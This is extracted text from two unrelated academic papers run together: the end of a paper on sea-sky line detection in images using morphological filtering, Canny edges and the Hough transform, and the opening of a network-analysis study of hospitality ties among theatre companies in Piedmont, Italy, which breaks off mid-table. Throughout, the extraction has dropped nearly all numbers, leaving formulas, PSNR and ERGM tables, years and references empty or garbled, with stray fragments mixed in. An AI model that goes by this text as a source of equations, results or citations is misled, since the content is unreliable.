when the structural elements is used to measure the target image, a geometric shape similar edge point can always be found near the edge points of the image. thus, it is not effective to retain the edge segmentation information of the image by using a single morphological structure element to extract the edge of the target image. consequently, when the sea-sky line is extracted in the target image. if the single size and shape structure elements are used for image processing, the location is not accurate, the de-noising effect is not ideal, and the detail information of the sea-sky line can not be retained effectively. in conclusion, this paper adopts multi-dimensional, multiple- shape structure elements to process sea-sky images. iii. sea-sky line detection algorithm design the sea-sky line detection algorithm in this paper is based on the mathematical morphology. the overall flow diagram is shown in the fig. . firstly, the sky-sea image is preprocessed. the mathematical morphology is used to filter the target sea-sky background image and denoise the interference of the sea-sky lines; secondly, the canny operator is used to extract the sea sky boundary of the preprocessed sea-sky background image. follow that the mathematical morphology is used again to remove the interference points, so that the sea-sky line detection is more efficient and accurate. finally, the hough line detection and the least square method are used. linear fitting is used to get the final sea-sky lines. image preprocessing interference point removal edge extraction hough line detection algorithm in this paper usual algorithm line fitting figure . overall flow chart step : we preprocess the image to solve the interference problems caused by strong watermark and uneven illumination. in which, the structural elements of closed operation and open operation are square structural elements. step :we use the canny operator to extract the preprocessed sea- sky pictures. step : the mathematical morphology is carried out to remove the interference points, so that the sea-sky line detection is more efficient and accurate. the structural elements is the linear structural elements. step : we use hough straight line detection and the least square fitting method to get the sea-sky lines. the followings focuse on mathematical morphology of image preprocessing, interference point elimination, as well as the hough line detection and other major steps to describe. a. image preprocessing in the process of the initial image collection, due to optical system distortion, relative motion, weather and other reasons, the noise is inevitable. in the process of transmission, noise can pollute the image and noise points have a certain bad effect on edge detection [ ]. generally, the gauss filter is used to remove noise. however, this paper uses the mathematical morphology filter to preprocess the image, which can make the brightness of the target image more uniform and remove the interference of the watermark. at the same time, that can preserve the structure gradient information of the image better. in this paper, a closed-open filter(cof) is constructed through the combination of opening and closing. the definition is shown in the formula ( ).  ( ) ( )cof f f b b    the mathematical morphological filters have the properties of transitivity, translation invariance, idempotency and duality. the structure element chooses the larger square structure elements, because the noise element of uneven illumination and the strong watermark is larger. b. edge detection the edge detection by the canny operator is a technology to extract useful structural information in different visual objects. and that greatly reduces the amount of data to be processed. it is now widely used in various computer vision systems. the canny operators are used in different visual systems to detect edges, but the requirements on the edge detection are similar, so the wide application of edge detection technology can be realized[ ]. for the grayscale image that has been preprocessed by the method of step , the gradient intensity and direction of each pixel in the image are calculated. the edges of the image can be directed to all directions, so the canny algorithm uses four operators to detect the horizontal, vertical and diagonal border in the image. the operator of edge detection returns the first order value of horizontal gx and vertical gy direction, thereby the gradient g and direction theta of pixels can be determined, as shown in formula ( ) and formula ( ).     in formula ( ),g is gradient strength. in formula ( ), the is an inverse tangent function.besides, the theta represents gradient direction the non-maximum suppression is applied to eliminate the spurious response that is caused by edge detection. the double-threshold detection is used to determine the real and potential edges. finally, the edge detection is completed by suppressing isolated weak edges. international journal of advanced network, monitoring and controls volume , no. , the canny operator is used to extract edges, so that all possible edges can be obtained to ensure the accuracy of edges. c. interference point removal after using the canny operator to extract the edges, the images with two value are obtained. there are still a lot of small noise points in the the images with two value. that causes interference to the next detection and fitting of sea- sky lines. therefore, we use the mathematical morphology operation to remove interference points. because the mathematical morphological operation is sensitive to the size and shape of structural elements, the appropriate structural elements must be selected. meanwhile, because the target is to obtain a sea-sky line, so the linear structure element is used to remove the noise points, so that the interference points can be removed .at the same time, the edge points of the target are not mistakenly removed [ ]. the linear structural elements used in this paper are shown in the formula ( ).  (' ', , )se strel line x y  in formula ( ), these character se represents the structure element, and the strel() is the function that created the structure element. in which, the ‘line’ represents a linear structure element, meanwhile, the x and y determine the size and direction of the structure element that we choosed. of which the linear structure element x and y have the following relationship, as shown in formula ( ):  , , ,... /( - ) 为单位角度 * , ,... x n n q n y n q n n             according to the characteristics of sea-sky line, this paper selects the linear structural elements, which can effectively remove interference points ,reduce amount of calculation in hough line detection and improve its accuracy and efficiency. d. line detection the basic idea of the hough transformation is the duality of the point to the line. after the image transformation, the images in the image space are transformed into the parameter space [ ]. in the x-y image space, a straight line baxy  (of which, a is the slope, b is intercept) corresponds the points in the  - parameter space. ρ θ y x figure . the image space in the image space, the point on a straight line is a sinusoidal curve in the hough parameter space; many points on the same line in the image space are a sinusoidal cluster in the hough parameter space and the curve clusters are intersected to a point, which is called the peak point. the peak point in the hough parameter space corresponds to a straight line in the image space. as shown in fig. , this is the image space; as shown in fig. , this is the parameter space. the hough transformation is converted from the image space of fig. to the parameter space of fig. . ρ θ p figure . the parameter space therefore , therefore, the hough transformation transforms the straight line detection problems in the image space to the points detection in the parameter space. there are a number of possible lines in the sea-sky image, but the sea-sky line is throughout the image .thus, the sea-sky line is the longest line segment in the sea-sky image, corresponding the local maximum value in the hough parameter space. by detecting the local maximum in the hough parameter space, we can find a corresponding line in the x-y image space, that is, the sea-sky line [ ] . e. straight line fitting through the hough line detection, the longest line segment is extracted. however, the sea sky line is a straight line through the whole picture. so we have to extract and fit the points in the line segment and get the final sea-sky line. through the whole image. the sea-sky line is gotted by selecting some points and making straight line fitting by the least square method. in this paper, the least square method is used to fit the straight line. the least square method is a mathematical optimization technique. it searches for the best function matching of data by minimizing the sum of squares of errors. the least squares method can be used to obtain the  is the unit augle international journal of advanced network, monitoring and controls volume , no. , unknown data simply and make the sum of squares between the obtained data and the actual data minimum. iv. experiment and result analysis to verify the results of this method, we selected three sea-sky background images in different environments, as shown in the fig. .the fig. (a) is a sea-sky image with lower visibility; the fig. (b) is a sea-sky image with strong watermark; the fig. (c) is a sea-sky image with uneven illumination. after the operations are performed on the matlab a software, two mathematical morphological processing cases are compared and analyzed. the mathematical morphology operations are used in the pretreatment of sea-sky image.two preprocessing methods are used. one way is to use the gauss filter to reduce noise and then conduct sea-sky lines detection. the results are shown in fig. . the other way is using the mathematical morphological filter to reduce noise and then conduct the sea- sky line detection, the results are shown in fig. . as seen from the fig. (b), the former method is not ideal for detecting sea-sky pictures with strong water marks, and there is an error. from the fig. , we can see that the method of this paper can accurately detect the sea-sky line in different environment. (a) (b) (c) figure . original picture of sea-sky background (a) (b) (c) figure . sea-sky-line detected after gauss filter processing (a) (b) (c) figure . sea-sky-line detected after mathematical morphological processing the images are results of sea-sky lines detection in fig. .the sea-sky-line detected by the algorithm in this paper .in order to measure the processed image quality, we usually refer to the psnr value to determine whether a particular processing program is satisfactory enough.thus, to quantitatively evaluate the experiment results, the experiment performance of the sea-sky line detection in three sea-sky backgound images are compared. the peak signal to noise ratio (psnr) is used. the psnr is the ratio of the variance to the information and noise, when the value of international journal of advanced network, monitoring and controls volume , no. , psnr is between the db and db,which means less noise. when the value of psnr is db ,which means better picture processing effect [ ]. the expression of the psnr is shown in the formula( ). mse f psnr maxlg   in which, max f is the maximum grayscale value of function ),( yxf . mse is a mean-square error that reflects the variance between the estimate and the estimated amount, as shown in the formula ( ).  mn yxfyxg mse m x n y        )],(),([  the obtained quantitative evaluation experiment data are shown in table . table i. comparison of pnsr values of experimental results image processed by gaussian filter image processed by filters in this paper mse pnsr /db mse pnsr /db fig. (a) . . . . fig. (b) . . . . fig. (c) . . . . from the numerical change of psnr in table , we can see that the quality of the picture is in high level in most cases ,for the sea-sky background pictures are processed by the gauss filter. however, from fig. (c), we can see that the value of pnsr is lower than db. thus, for the unevenly illuminated sea- sky background pictures, the gauss filter can not effectively process and solve the uneven illumination problem; for fig. (b), the psnr values of the pictures after the gauss filter processing are higher than the result of the pictures after the mathematical morphological filter processing. as a result, it can be seen that the quality the pictures after the gauss filter processing is relatively higher than that after morphological filter processing. it is also shown that the gauss filter can effectively remove the interference of strong watermarks on the image processing. however, according to the fig. (b) effect diagram of the sea-sky lines detection after the gauss filter processing, it is known that although the pictures are processed by the gauss filter. they get better quality of the images. it effectively removes the interference of the strong watermarks, but also loses more detail information of the edge of the sea and the sky, so that the effective points of the edge are also erroneously removed. there is not an accurate sea-sky line to be obtained . as seen from the table , the psnr values of the images that are processed by the mathematical morphological filter in this paper are all between db and db, which indicates that the image processing quality is better. at the same time, combining with figure , we can know that the algorithm in this paper can effectively preserve the details of the sea-sky boundary by the algorithm in this paper. the more accurate sea-sky lines can be obtained. the sea-sky lines in different sky-sea background images are measured. it objectively reflects the feasibility and superiority of the algorithm in this paper. the mathematical morphology is applied to the interference point removal after edge detection by the canny operator .after the interference points are removed, the hough transformation is used to extract the sea-sky lines so as to achieve the final detection and fitting of the sea-sky lines .we get the detection result of the sea-sky lines finally,as shown in fig. . we obtain the two-value pictures after edge detection by the canny operators.thus, the mathematical morphology is applied to the two-value pictures.the experimental data of table are analyzed by comparing the number of effective points reserved before and after second mathematical morphology processing in the experiment. table ii. number comparison of valid point before and mathematical morphology processing possible points a valid points b ratio b/a time- consuming /ms fig. (a) % fig. (b) . % fig. (c) . % from table , it can be seen that after the second morphological processing ,based on the special structure element, the interference points of the sea-sky lines can be reduced effectively. because of the edge extraction using the canny operator, all the possible edges are detected. however, only one of the required sea-sky line is needed. at the same time, some interference points are produced when the edge detection is performed. these are unavoidable. under the premise of guaranteeing the valid the sea-sky line information point ratio (b/a), the effective detail of sea-sky lines are protected, the possible points (a) are effectively reduced . from the data change in table , we can see that the interference information produced by edge extraction is the lower for images with lower visibility. for images with uneven illumination, there are more interference information produced by the operation of preprocessing and edge extraction. these interference information will cause the interference problems on straight line detection and fitting. that makes the sea –sky line extraction difficult and inaccurate. at the same time, it shortens the time of straight line detection and improves the efficiency of the algorithm in this paper. the mathematical morphologic is used, the computation amount of hough detection is reduced. meanwhile, the algorithm in this paper reduces the interference on the sea-sky line fitting. thus, the algorithm in this paper ensures the efficiency and accuracy of the sea-sky line detection. therefore, the method of this paper achieves the expected effect and the extraction effect of sea-sky lines is ideal. international journal of advanced network, monitoring and controls volume , no. , v. conclusion this paper presents a method of the sea-sky line detection based on the mathematical morphological. firstly, the image is preprocessed by mathematical morphological filtering. followed that, the canny operator is used to extract the sea-sky boundary. secondly, the mathematical morphology processing is once more used to remove the interference points on the sea-sky line; finally, the sea-sky line is detected by the hough transform and fitted by the least square method. the experimental results show that, this algorithm can detect the sea-sky lines, as well as the robustness is better, accuracy is higher. it can effectively cope with the complex marine environment and weather effects. references [ ] messages , zhengjia , under combined .sea-sky line detection algorithm based on morphological processing and least square method [j]. optics and optoelectronic technology , , one ( ): - . [ ] liang d, zhang w, huang q, et al. robust sea-sky-line detection for complex sea background[c]// ieee international conference on progress in informatics and computing. ieee, : - .. [ ] h. wang,z. wei,s. wang,et al. a vision - based obstacle detection system for unmanned surface vehicle[c]/ /proceeding of the ieee conference on R obotics , automation and mechatronics, : ~ . [ ] wang bo, su yumin, wan lei, et al. sea sky detection method based on gradient saliency for surface unmanned craft [j]. acta optica sinica, ( ): - . [ ] dryden , zhang . xinggang. a method of periodic noise removal based on weights adaptive morphology [j/ol]. computer technology and development , (a): - [ - - ]. [ ] jiang l, guo y. image edge detection based on adaptive weighted morphology[j]. chinese optics letters, , ( ): - . [ ] feng gui, gui pre- , , wind, lin . . morphological method in edge detection of gray image [j]. remote sensing information , : - ,. [ ] wanghuifeng , war guile , luo . xiaoming. research and application of edge detection algorithm based on mathematical morphology [j]. computer engineering and applications , ( ): - . [ ] zhong junliang. . real-time detection and tracking technology of infrared small and dim targets [d]. graduate school of chinese academy of sciences ( changchun institute of optics and fine mechanics and physics , . [ ] wang fang , changwei , li . wenshu. image edge extraction method based on mathematical morphology [j]. mechanical engineering and automation , ( ): - . [ ] li mu, chi ge, etc. adaptive canny operator edge detection technology [j]. journal of harbin engineering university, , ( ): - . [ ] wang guangling. . research on the algorithm of detecting and tracking video velocity based on moving objects [d]. taiyuan university of technology , . [ ] zhanghuang , , yu shenglin, bai bangong. selecting principles for structural elements in morphological image denoising [j]. data acquisition and processing , , s : - . [ ] dong yu star, liu , weining, dongyu-xing, , . . small target detection for sea-sky background based on gray character [j]. china optics , ( ): - . [ ] lu junwei, wang , xiaodong,, and . on. sea-sky line detection algorithm based on fractal feature and hough transform [j]. journal of the naval institute of aeronautical engineering , ( ): - . [ ] xu tianji , zhang guican, jack. , . watershed color image segmentation based on morphological gradients [j]. computer engineering and applications , , (one): - microsoft word - volume _final insna.org | issues & | volume | strategic and genetic networking: relational endowment in a local cultural offer andrea gallelli sociologist, independent researcher abstract the local theatrical offer is the result of all the theatre companies which perform shows in each other’s venues. theatre hospitality is an inherently relational phenomenon, and besides big national and international tours, it is an important part of the local cultural landscape. aiming at contributing to the literature on network analysis applied to the inquiry on culture, the research adopts the network perspective to test hypotheses on companies’ relational be- haviors and mechanisms of network formation in a local context in italy. the analyses show that companies which get more public funding tend to host more; there is a homophily effect based on audience levels; companies tend to reciprocate hospitality relations and form clusters of close collaborations. keywords: cultural production; theatre; social network analysis; ergm; arts this research did not receive any specific grant from funding agencies in the public, commer- cial, or not-for-profit sectors. author andrea gallelli holds a phd in sociology from the university of turin, where he conducted research on the relational dimension of culture. he has been post-doctoral research fellow at the university of bologna, where he worked for the eu project interco-ssh (international cooperation in the social sciences and humanities), about the institutionalization of the social sciences in europe, with a special focus on networks in scientific production and the interna- tional circulation of key authors such as bourdieu and gramsci. his research mainly focuses on social capital and social networks, with applications on cultural production, scientific communities and social exclusion. acknowledgements this work would not have been possible without the collaboration and the data provided by osservatorio culturale del piemonte. my thanks go to the ocp staff. the author is also indebted to valerio leone sciabolazza, university of florida, for precious technical support on erg models. please send all correspondence to andrea.gallelli@mail.com connections strategic and genetic networking | volume | issues & | insna.org . introduction what do we see when we go to the theatre? of course we see a company performing a piece, and our cultural tastes are responsi- ble for whether we enjoy the show or not. but tastes apart, when we go to the theatre we probably see a company which does not own the venue in which the show is taking place. so, in most cases, when we decide to go to the theatre we make a dou- ble choice: we choose a show, because we think we will probably enjoy it, and we choose a theatre, because it is close to home, because it is beautiful, because we have a subscription, and so forth. in any case, that specific show involves two dif- ferent subjects, one company and one thea- tre. and so it is for all the theatre seasons. so, we can say that the whole cultural offer in a specific place in a specific moment, is the result of all the possible pairs of host- ing and hosted subjects. if we now turn the perspective from the consumer (who goes to the theatre) to the producer (any possible local theatre company), we understand that each theatre season is the result of the movement of all the companies that host each other. this is precisely hospitality in theatre, it is an in- herently relational phenomenon, consisting of connections among theatre companies that perform in each other’s spaces, and, together with big national and international companies’ tours, it is a very important part of the local cultural landscape. so, what are the reasons that lead two particular companies to connect? are there companies more inclined to host, and others more inclined to move? are there groups of companies that tend to host each other, forming cultural clusters? are con- nected companies somehow similar? in this study we observe the struc- tural properties of the theatre offer in a lo- cal context in italy, and we propose hy- potheses about network formation mecha- nisms. we use network descriptives and exponential random graphs models, which allow a joint observation of individual properties and structural configurations, in order to observe the social mechanisms that shape the cultural offer. . analytical framework . an introduction to the relational look on culture scholars and experts in widely different fields have underlined the importance of the relational dimension of cultural pro- duction, which has been defined and em- pirically shown in different ways. broadly speaking, major sociologists agree on a vi- sion of the cultural field as somehow grounded on systems of relations generat- ing and maintaining it. for pierre bourdieu social capital consists of “the aggregate of the actual or potential resources which are linked to the possession of a durable network of more or less institutionalized relationships of mutu- al acquaintance and recognition” ( , p. ), and these sets of relational resources, together with economic and cultural capi- tal, are responsible for the position occu- pied by each individual within the social space of a field. following howard becker, “all ar- tistic work, like all human activity, in- volves the joint activity of a number, often a large number, of people. through their cooperation, the art work we eventually see or hear comes to be or continues to be” ( , p. ). in the analysis of cultural production he underlines the importance of networks, considered as the cooperative activity of all the subjects involved in the construction of the art worlds. moreover, according to the produc- tion of culture perspective (peterson and anand ) the industry structure in the creative fields depends on the ways in which producers relate to one another – many small enterprises in competition, few big vertically integrated ones, or different combinations of these forms – and the dif- ferent configurations of producers deter- mine the presence of certain kinds of prod- ucts in the marketplace. strategic and genetic networking connections insna.org | issues & | volume | each of these approaches empha- sizes a different aspect of the structural properties of the cultural field. bourdieu focuses on the positions of the subjects in- volved in the field, and on how these posi- tions generate advantages in the field for those with a good social capital base. becker attributes great importance to rela- tions as a necessary part of the creative process. the production of culture perspec- tive looks at the characteristics of groups of producers in order to assess some gen- eral properties of cultural markets and in- dustries. even with substantial differences, all these perspectives on culture recognize that the ways in which the producers relate among them have profound consequences in shaping the cultural field. furthermore, evidence has been provided on how social network analysis, as both a theoretical and a technical set of tools, may be a common ground on which these different relational perspectives on the cultural field may inte- grate (mclean ; fox ; bottero and crossley ; de nooy ). in this sense there is a joint focus to the inquiry on culture from different theories and ap- proaches, with the possibility of agreement on some aspects of its relational founda- tion. but in spite of the possibility of a general common relational look on culture, there is a risk arising from the application of network methods to a complex and mul- tifaceted phenomenon like culture: the ex- cess of description. network analysis, as a methodological toolbox, must be applied in the light of a comprehensive theoretical framework in order to provide meaningful explanations, and not just meticulous de- scriptions of cases. having declared this theoretical need, it must be stated that at the point at which research has arrived to- day in this field, we cannot count on a co- herent and well defined perspective on re- lations and cultural production. at the same time our aim is not to use the case under our observation to verify one specif- ic theory. rather, from the review of dif- ferent theories and empirical studies, we propose an inductive theoretical path, from which will emerge a possible common framework for the analysis of relations within cultural fields. . strategic and genetic networking there is increasing interest in the empirical analysis of the cultural field through net- works. researches in different artistic and cultural domains have in common the use of networks as lenses on consumption or production processes. what distinguishes these researches is the different, even if not mutually exclusive, function they attribute to networks. on the one hand networks may be seen as the result of a set of indi- vidual properties or abilities that are used in the field in a strategic way in order to follow specific goals. on the other hand networks are used with their structural properties in order to understand some ge- netic characteristics of the field and the so- cial processes behind it. based on these in- terpretations, grounded in the thought of the above-mentioned authors, we can dis- tinguish a strategic and a genetic function of networks. the strategic function of networks refers to the (conscious or subconscious) deployment of relational resources within a field with the result of increasing the chances of achieving an objective. in contemporary literature on cul- tural production there are some empirical examples of such a strategic role of rela- tions. for example research on institutional networks in the cultural field, like festival networks (gallelli ) and museum con- sortia (bagdadli ), shows important results about network creation processes and the way in which the relations support economic performance. for some subjects, the lack of economic capital may be inte- grated with relational resources, allowing a weak organization to survive in the market. the availability of “complementary re- sources”, like networks, is considered a key factor in the formation of alliances. studying the fashion industry in milan, d’ovidio ( ) has shown that cultural workers, working together, trigger virtuous connections strategic and genetic networking | volume | issues & | insna.org mechanisms of mutual recognition and trust which support the companies in estab- lishing themselves and gaining success. these aspects are in line with a bourdesian view of capital conversion, particularly at- tuned to artistic production in which, often, the power of economic relations may be dominated by networking dynamics. the genetic function of networks refers to the relational elements embedded within a social structure, which have an in- fluence on the way in which a phenome- non eventually manifests. research on cul- tural districts (mizzau and montanari ; santagata ) shows how links between the subjects in the field foster cre- ative processes, cooperation and the supply of cultural activities, and also how rela- tions among the producers generate a ‘cre- ative atmosphere’ that supports production processes (bertacchini and santagata ). economic sociologists also argue that in the contemporary economy, the so- cial and relational dimensions of innova- tion processes are becoming more im- portant than the organizational characteris- tics of the firms. innovative processes grow not only inside the boundaries of the companies, but also through both formal and informal relations among them (trigil- ia ). in their pioneering study on crea- tive teams in broadway musical produc- tion, uzzi and spiro ( ) looked widely into the structural properties of artistic co- operation. they have shown that financial as well as artistic success is associated with medium levels of small world(ness) (see milgram ) that is, sets of rela- tional configuration characterized by short global separation between the clusters and high local cohesion. networks have also been used to demonstrate the mechanisms of diffusion of a music scene (crossley ; ), showing how relational dynamics are as important as local historical and biograph- ical processes for the genesis of a cultural phenomenon. in a recent collection of em- pirical applications of network studies to music worlds, the relevance of the rela- tional approach for all the domains in- volved with cultural production, such as production processes, tastes, gender rela- tions, careers, and so forth has been widely proved (see crossley et al. ). as widdop states: ‘being active in music [we can generalize in culture] is much more complex than simply basing it on theoreti- cal assumptions of class and education; it is fundamentally a social act; the level to which you engage in music [culture] and the genres you attach to are somewhat de- pendent upon the networks you are em- bedded in and position in the social struc- ture’ ( , p. ). arguably, it is not rare to observe relational processes with mixed functions. for example, starkey, barnatt and tempest ( ) describe the case of latent organizations: informal key configurations of stable subjects, which emerge according to social mechanisms related to trust and mutual cooperation and are employed stra- tegically for sustaining processes of pro- duction and divulgation of cultural goods and activities in the marketplace. . networked theatre companies: research hypotheses as mentioned above, theatre companies performing in each other’s venues create a network of hospitality relations that is a relevant part of their activity. besides the intrinsic artistic value, these relations have a strategic function and constitute genetic processes that characterize the local cultur- al offer. in our empirical case, we interpret the social status related to hospitality rela- tions, as a strategic element of the produc- tivity of the companies. the prestige of the hosting and hosted subjects (sometimes theatre websites advertise ‘prestigious hos- pitality’ alongside the company’s reper- toire) may be a vehicle of success, as in the case of small companies which manage to perform in big theatres, or small theatres that host well-established companies; in this sense the tendency to create links does strategic and genetic networking connections insna.org | issues & | volume | not necessarily reflect the companies’ eco- nomic resources (hypothesis ). this hypothesis is based on the in- terpretation of social capital as a strategic complementary resource, rather than a form of capital which increases propor- tionally to other forms of capital. it might be true in some cases that the wealthier an organization, the better its chances of at- tracting relations; but it is also true in many cases that artistic collaborations arise to support the absence of economic capital or other resources, especially in periods of crisis and for small subjects. in order to investigate some of the genetic mechanisms embedded in the rela- tions among companies, we borrow from network theory an influential concept, which may help to understand some of the processes related to network formation. the homophily argument (mcpherson et al. ), refers to the tendency for people or organizations to form ties dispropor- tionately with others who share similar at- tributes with them. in our case, the similar- ity of organizational features between two companies may explain the emergence of recurrent patterns of artistic collaboration. even if small companies strive to perform in big venues, it is more probable that in their daily artistic activity they will con- nect with other small subjects; and also big theatres will be more inclined to host fa- mous companies in order to ensure ade- quate ticket sales. therefore, we can hy- pothesize that companies tend to connect to others with similar organizational char- acteristics (hypothesis ). moreover, while pure market rela- tions are mostly unidirectional and based on economic convenience, artistic collabo- rations, as mentioned, may foster mutual recognition and trust, which are generated by reciprocity. accordingly, we hypothe- size that if one company hosts another one in its own venue, there are good chances that this relation will be reciprocated (hy- pothesis ). hospitality allows information transmission, as it implies direct contacts between the two subjects. these kinds of relations produce a fund of information within a defined territory, knowledge of who works with whom, the prospect of possible collaborators, useful information about the characteristics of the other sub- jects and the market conditions in which they operate. nonetheless, hospitality may ensure a certain margin of uncertainty con- trol. even in periods of crisis, companies embedded in dense networks of collabora- tions, may count on a greater possibility of performing, compared to isolated ones. as a result, relations among companies tend to be embedded in dense groups (hypothesis ). successful cultural cooperation is likely to result in relational configurations that are more complex than simple reciprocal dyads. especially in local cultural markets in which there are small geographical sepa- rations among the subjects, we expect to find triadic closure, that is, relations in which, if subjects a and b are connected, and a and c are connected, b and c will also probably share a link. this is one of the typical (genetic) mechanisms that can be found in creative contexts, such as cul- tural clusters, ‘art worlds’ or scenes, in which widespread collaboration and rela- tional closure are tangible. . data and methods . data our empirical analysis is based on data about hospitality shows in piedmont, italy, among professional companies. the source of the (anonymized) data is the cultural observatory of piedmont (ocp), a private organization in partnership with the region, which conducts research in the field of cul- tural goods and activities. for the selection of the subjects involved in the study we followed the definition of ’professional company’ according to the regional law / concerning the system of public contribution to theatre activities. public funds are distributed to companies on the basis of criteria concerning artistic and economic standards, such as a minimum number of shows per year or the number of connections strategic and genetic networking | volume | issues & | insna.org paid hours per actor. our data concern all the companies that met the regional criteria in . as a result we were able to recon- struct the whole network of the regional professional companies in that year. the ties are directed, where the direction indi- cates if the company was the hosting sub- ject (incoming relation) or the one that per- formed the show (outgoing relation). data about individual characteris- tics of the companies were also available, concerning some economic and perfor- mance indicators. . ergm for our analyses we applied both the de- scriptive analytical tools available with ucinet software (borgatti et al ) and statistical modelling for network data. exponential random graph (erg) family models (lusher et al ; robins et al ) have the purpose of explaining the different interwoven mechanisms respon- sible for shaping the network as we empir- ically observe it. they are designed to deal with types of effects at different analytical levels. in our case we consider nodal at- tributes, which are organizational and eco- nomic characteristics of the companies, and structural effects, network configura- tions useful for capturing endogenous so- cial mechanisms. relational social dynamics, by def- inition, violate the assumption of inde- pendence of the observations on which standard statistical models are based, thus erg models are explicitly designed in or- der to include the mutual dependence of the nodes . as a result erg models are appropriate to our purposes because they meet both a technical need – the fact that two companies are tied makes them mutu- ally dependent – and the theoretical rele- where the models do not include any network effects, as the following model , the erg mod- els are similar to traditional logistic regression models, analyzing the presence or absence of a relation between two nodes as dependent varia- ble. vance of analyzing the joint effect of indi- vidual and structural determinants. . variables and models in the first part of the analysis we analyze relational metrics useful for describing the general structural properties of our net- work. secondly we present two models, the first one with only nodal attributes, with the aim of understanding which indi- vidual characteristics of the companies ex- plain the emergence of artistic links. among these variables we consider the age of the companies, to control the fact that older companies might have a wider knowledge of the other subjects in- volved in the field and consequently more chances to connect with them. secondly, we analyze the impact of the amount of funding (expressed in mil- lions of euro) received by the company, as a proxy for its economic resources, on the probability of sending (nodeocov) and receiving (nodeicov) ties, in order to understand how the relational behavior of a company is related to its economic capaci- ty. moreover, with the aim of testing the homophily hypothesis (explained above), we consider a set of variables re- garding the overall audience of the compa- nies (through the total number of tickets is- sued, including free ones, divided into classes: up to tickets per year; from to ; over ), the city in which the company is settled (four pied- montese provinces), and the number of shows performed in schools (as a proxy for a more education-oriented, rather than a more market-oriented artistic behavior of the company). in model we add structural ef- fects. reciprocity concerns a mutual rela- tion between two companies: if they each host and are hosted by others, this indicates a strong and clustered artistic collabora- tion. secondly we analyze popularity and expansiveness effects, observed re- spectively by gwidegree and strategic and genetic networking connections insna.org | issues & | volume | gwodegree statistics. these parame- ters control for particularly unbalanced de- gree distributions, concerning respectively incoming and outgoing relations. these are useful to understand if the field is domi- nated, on the one hand, by subjects who at- tract the majority of the other companies, and, on the other hand, if there are some subjects particularly active and known in the field who perform in most of the local theatres. lastly, the model also includes transitivity and hierarchy mechanisms. in the first case we control for transitive clo- sure through the geometrically weighted edgewise shared partners (gwesp) pa- rameter. it captures the typical triangular pattern, in which actor a is connected to actor b, actor b is connected to actor c, which in turn is connected to actor a. this configuration is particularly relevant in or- der to catch clusters of companies with cultural-artistic uniformities that tend to collaborate. on the other hand, in the sec- ond case, we control for the presence of hierarchical configurations in the network. the gwdsp parameter (geometrically weighted dyadwise shared partners) catch- es the tendency in the field for some com- panies who do not collaborate, to be at least indirectly connected to a common third company, showing a more hierar- chical, non-triangular, configuration. . analysis . network descriptives figure , elaborated with gephi (bastian et al. ), is a graphical representation of the hospitality relations among the companies. as mentioned, the direction of the arrow indicates whether the company is performing or hosting; the size of the node is proportional to the degree of the compa- ny (also indicated inside the circle), irre- spective of the direction of the relations. the different colors of the nodes aim to give a general indication of the level of embeddedness of the companies in local clusters with dense sub-networks. the al- gorithm (blondel et al. ) is a heuristic method based on modularity optimization, useful for unfolding the community struc- tures of networks. as we can see there are four sub-groups of companies with greater levels of density inside the groups than outside. this gives a first general indica- tion of the fact that in our field of observa- tion there is a certain degree of recurrent collaboration among some actors, which makes the cultural offer somewhat seg- mented. connections strategic and genetic networking | volume | issues & | insna.org figure : network of hospitality relations among professional theatre companies in piedmont, so, to what extent do the compa- nies connect with one another? the density of the overall directed network is . (table ), meaning that almost % of all the possible connections among all the nodes is actually present. if we do not con- sider the direction of the collaborations, regardless of whether a company is hosting or performing a show, but just considering the presence of a relation between them, the density is around %. generally speaking this is not a particularly high lev- el of density, but it is high enough consid- ering that our cases are theatre companies potentially in competition within the mar- ket of the cultural offer of a territory. the general high level of connection among the companies is also shown by the average degree, indicating that, regardless of the di- rection of the collaboration, one company is tied on average with . others. centralization metrics, in particular the in-centralization value of around %, shows that if there is, we can say, a diffuse local cultural collaboration in the whole field shown by the presence of many dy- ads, at the same time some theatres (in figure two of them are immediately visi- ble) have a higher propensity to host. these may be recognized as well-known venues, in which probably every company aims to perform in order to gain visibility and success. in every local cultural scene there are one or two theatres which are considered the best (or simply the biggest) ones. in spite of these market characteris- tics, the field seems to be quite accessible and open, for example there is an average distance of about . between any two companies, meaning that even if i did not collaborate with a specific company which i am interested in, i probably know some- one who did; this general feature of the field is useful for matters regarding not on- ly direct collaboration, but also for easy access to information and formation of conventions. on that line, the clustering coefficient shows that on average over % of companies connected to a focal one, are in turn in touch with one another. table : network descriptives directed un-directed density . . avg. degree . . in-centralization . . out-centralization . - avg. distance . . avg. clustering coeff . . strategic and genetic networking connections insna.org | issues & | volume | so far we have focused on the gen- eral structural features of the field. these are important as tools to describe the rela- tional dimension of our observation con- text; but also considering that the network properties reflect the underlying social mechanisms responsible for the formation and the maintenance of the network itself. this perspective has deep theoretical roots in sociological thinking. for example, new economic sociology (granovetter ) in- terprets economic phenomena as embed- ded in systems of social relations. moreo- ver, following harrison white ( ), markets emerge from the interactions of producers, who relate to and observe each other trying to satisfy consumer’s requests. thus, particular structural properties are functional to the circulation of information, the formation of reputation, alliances and competitions. for example, becker’s ( ) ar- gument, in contrast to the classical theory of reputation in arts, is that reputation is formed and carried on within art worlds, and does not only depend on the artistic object itself. in this sense, the structural properties of an artistic field are indeed in- dicators of the social conditions in which information and judgments flow in real contexts. . models we now present the results of the models, which include individual and structural variables. we read the results as the impact of the single parameters on the tendency of forming a tie between any two companies, uncovering individual properties and en- dogenous mechanisms that are responsible for shaping the network. significant effects are presented in bold in table . the first parameter, edg- es, in both models is negative and signifi- cant; we interpret this variable as the inter- cept in standard regression models. in this case it indicates that the probability of ob- serving an edge, i.e. a couple of compa- nies, outside any other possible more com- plex relational configuration is negative; this value does not imply any substantive explanation, it simply indicates that the re- lational behaviors of the companies are ac- tually embedded in more complex social structures than dyads. in model significant coefficients are: funding in degree, audience homophi- ly for class and school performances. these variables have a positive effect, even though it is not particularly strong for funding and school performances, on the probability of forming ties. these effects can be interpreted as follows: a) there is a tendency for companies which get higher public economic support to have incoming relations; b) big companies tend to share ties with one another more than they do with smaller companies; c) the greater the difference in the number of shows per- formed in schools between two companies, the greater is the probability for them to share a tie, indicating relational heterophily based on the number of shows performed for students. this implies that sharing a more educational theatre activity is not a predictor of preferential connection among companies. the models have been estimated using statnet package for erg models in r (handcock et al., ) connections strategic and genetic networking | volume | issues & | insna.org table : erg models of tie formations among theatre companies model model edges - . - . ( . ) ( . ) age . . ( . ) ( . ) funding out degree (nodeocov) - . - . ( . ) ( . ) funding in degree (nodeicov) . . ( . ) ( . ) city (nodematch) . . ( 